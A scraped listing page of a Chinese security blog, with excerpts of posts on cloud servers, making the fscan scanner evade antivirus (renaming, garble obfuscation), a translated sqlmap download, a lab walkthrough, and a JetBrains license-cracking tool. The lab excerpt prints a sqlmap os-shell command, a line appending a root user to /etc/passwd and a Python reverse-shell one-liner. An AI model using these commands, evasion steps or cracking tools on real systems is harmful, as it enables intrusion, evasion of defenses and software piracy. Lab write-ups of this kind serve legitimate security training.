首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,828 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
11
篇与
的结果
2026-06-19
阿里云 vs 腾讯云综合对比,服务器选购方案
基于实际价格数据的全方位分析,帮你选到最适合的云服务器一、前言很多师傅们第一次买服务器都踩坑了,要么买贵了,要么配置不够用,要么续费时价格翻倍。我做站两三年了,前前后后用过
2026年06月19日
923 阅读
0 评论
0 点赞
2026-05-21
fscan免杀研究,过国内所有最新版杀软以及Defender
先来看看效果,当前fscan版本为2.1.3,github最新版,上周发布的,https://github.com/shadow1ng/fscan/设置好代理$env:GO111MODULE = "on" $env:GOPROXY = " https://goproxy.cn ,direct" 编译方法go build -ldflags="-s -w" -trimpath main.go 1、特征替换比如改!windows下的批量替换脚本Get-ChildItem -Recurse -Filter "*.go" | ForEach-Object { (Get-Content $_.FullName) -replace 'github.com/shadow1ng/fscan', 'xiaoyu' | Set-Content $_.FullName } 2、版本信息在flag.go中能找到这些信息改!3、清除残留字符commin/logger.go改!core/port_scan.go 修改 PE 头信息core/web_scanner.go改!web/api/result.go改!4、修改banner同样的也在flag.go中改!5、打包go.mod最上面一行,否则会导致编译不成功,改!打包go build -ldflags="-s -w" -trimpath main.go 火绒被杀换一种打包方案$env:GOOS="windows"; $env:GOARCH="amd64"; go build -ldflags="-s -w" -trimpath main.go 还是被火绒杀掉无窗口模式go build -ldflags="-s -w -H=windowsgui" -trimpath -o fscan_no_window.exe main.go 还是被杀6、加壳被杀7、安装garblego env -w GOPROXY=https://goproxy.cn,direct go install mvdan.cc/garble@latest go mod tidy garble基础混淆,被杀go run mvdan.cc/garble@latest -seed=random build -ldflags="-s -w" -trimpath -o xiaoyu.exe . garble 加上 -literals 字符串加密,被杀go run mvdan.cc/garble@latest -seed=random -literals build -o xiaoyu.exe main.go 其他免杀操作,比如添加大量无用代码/虚假函数/变量/结构体,改变变量名称,添加大量虚假运算、控制流、数据结构,添加虚假网络操作,反调试技术,DLL等等我有一刀,可斩宇宙![狗头]360防护引擎全开本地执行一切正常没有被杀火绒内存查杀全开windows安全中心分析时间,2026年5月21日,晚18点55分注:因部分人原因,本文仅提供免杀学习参考,不分享任何文中所使用到的工具,小羽我技术菜,工具过不了卡巴,就别喷了
2026年05月21日
823 阅读
0 评论
0 点赞
2026-05-20
2026最新sqlmap汉化版下载,教学必用!
这次汉化的比较全面,免费分享,之前流传的中文版本已经非常老了,还系统不兼容,现在是26年最新版本的sqlmap,版本号1.10.5.3首先就是使用示例:我搜集了各种常用的sqlmap命令,直接举例在了帮助界面中,这样就能直接复制粘贴,再也不用手动敲命令了帮助界面汉化另外对于一些细节也做了汉化处理对于注入类型也进行了汉化处理,以及操作系统识别,web识别,后端识别等等表数据获取--os-shell获取方式,给我赚个转存费就行(无夸克链接,只有百度):通过网盘分享的文件:工具专区 链接: https://pan.baidu.com/s/1XUsii27r3js5InpM5cQziw 提取码: yqwy
2026年05月20日
663 阅读
0 评论
0 点赞
2025-05-18
AIWEB1综合靶场通关教程【附靶场环境】
前言如果要进网安交流群的,后台菜单栏点击加群即可(建议微信群),靶场获取后台回复【AIWEB1】下载之后设置为nat模式启动即可,不需要登录靶机复现主机发现访问即可信息收集robots.txt文件访问尝试,原来是什么也没有的,404我们去访问这个上级目录,发现有一个id注入测试语法错误,存在sql注入漏洞抓包sqlmap爆表发现表里什么也没有,换思路没有权限dirb扫一下看看,有一个info.php网站绝对路径禁用的函数,没有禁用eval本地文件包含开启,以及php版本(%00截断,低于5.2),但似乎没什么用这里我们有两种方法方式一通过查找secure_file_priv 的值1、DBA权限,这里我们发现可以对文件进行读写sqlmap -u 'http://10.0.0.84/se3reTdir777/#' -data "uid=1&Operation=%E6%8F%90%E4%BA%A4" -p 'uid' --privileges2、secure_file_priv方式二从phpinfo中的网站绝对路径进行拼接尝试有了绝对允许上传文件的角度路径那么我们就能使用sqlmap获取shellsqlmap获取shell使用sqlmap的oshellosshell原理通过sqlmap -v 5 参数可以查看流量包通过分析,得到sqlmap的osshell原理就是,通过into outfile/into dumpfile写文件的方式进行文件写入然后再进行访问这个上传的写入sqlmap会向这个上传的网站目录写入两个文件1、文件上传木马文件2、命令执行文件文件上传成功后,即可执行命令(与蚁剑不兼容)注意:如果你退出了这个osshell,那么这两个文件都会自动删除,导致执行不了命令这是会话维持中,可以执行命令会话断开断开后尝试执行命令上传成功后,没有找到这个flag.txt文件,应该是没有权限读取10=system('find / -name flag*');查看/etc/passwd权限,发现漏洞,竟然可以读写文件,我们追加一个用户新加用户之前创建一个登录密码perl -le 'print crypt("123456","addedsalt")'新加一个用户,分到root组进行提权echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd靶机发现还有nc反弹shell,查看攻击机ip地址靶机nc发现没有-e参数,反弹不了shell看看靶机有没有python很好,有python,我们使用python反弹shell,攻击机开启监听中间我断网了,ip地址变了一下,之后操作都是这个ip我们尝试使用python反弹shellpython -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.7',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"如果没有成功,就多试几次我们尝试切换用户,提示必须从终端运行这个问题搞我半天,后来发现可以使用python调用本地shell即终端升级echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py su test 123456模糊查找flag的位置cat 即可
2025年05月18日
1,018 阅读
0 评论
0 点赞
2025-05-18
2024年7月JetBrains全家桶激活到2099年工具分享,pycharm、IDE、phpStorm等专业版激活工具
2024年7月JetBrains全家桶激活到2099年工具分享,pycharm、IDE、phpStorm等专业版激活工具注意:工具获取点个关注即可,互帮互助嘛,以后也会推出其他pj工具,关注后回复【激活】!!!,注意是【激活】!!!,哪个没脑子的回复其他东西,拼音都不会打的都有,之前其他工具就这样,注意是【激活】!!!!本工具不收费,只要宝子们点个关注多多支持看到日期是2099年到期,下面开始演示,废话少说(这里我的操作系统是,windows server 2019)这里我们以pycharm激活过程为示例下载地址:https://www.jetbrains.com.cn/en-us/pycharm/download/?section=windows其他的请自行尝试安装2024.1.4专业版安装成功打开我们的全家桶激活工具,找到pycharm激活(放在哪个位置都可以,工具会自动检测pycharm路径,等待他弹出suucess就好!),注意有些操作系统可能会激活不成功,但绝大多数都能成功,只要你的系统是官方window系统此时重启pycharm即可【小羽网安】专注于网络安全领域,py大数据编程,破解工具分享,感谢阅读
2025年05月18日
1,054 阅读
0 评论
0 点赞
1
2
3